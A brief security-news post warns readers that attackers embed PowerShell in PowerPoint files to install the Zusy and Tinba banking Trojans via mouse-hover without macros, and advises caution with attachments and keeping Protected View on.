In general, it’s fairly easy to prevent poisoned Microsoft Office files from doing any damage, because the traditional approach hackers have been using relies on macros. If you disable macros on your system, then even if you download and open the poisoned file, it won’t be able to do any harm.
That’s not the case with this new threat, however, which makes it dangerous.
The hackers have figured out a way to PowerShell code, injected into a PowerPoint presentation file to install malware without having to rely on macros at all.
Even worse, you don’t even have to open the file. Simply hovering over the link to the attachment is enough to initiate the installation in the background. In practice, the way this works is as follows:
A user hovers over the link and the PowerShell code activates. If your version of Microsoft Office has the Protected View security feature enabled, you’ll get a warning about the file, and have an opportunity to close out of it without any ill effects. If not, you won’t get a warning at all, and the poisoned file will install its payload. The same thing will happen if you disregard the warning, even if Protected View is enabled.
So far, the research team has uncovered two types of malware being installed via this new methodology: Zusy and Tinba, both banking Trojans, but clearly, any type of malware can be inserted via this methodology.
This goes to show that simply disabling macros isn’t enough anymore. Be very careful when opening PowerPoint attachments, even from people you know. To do less could prove costly in more ways than one!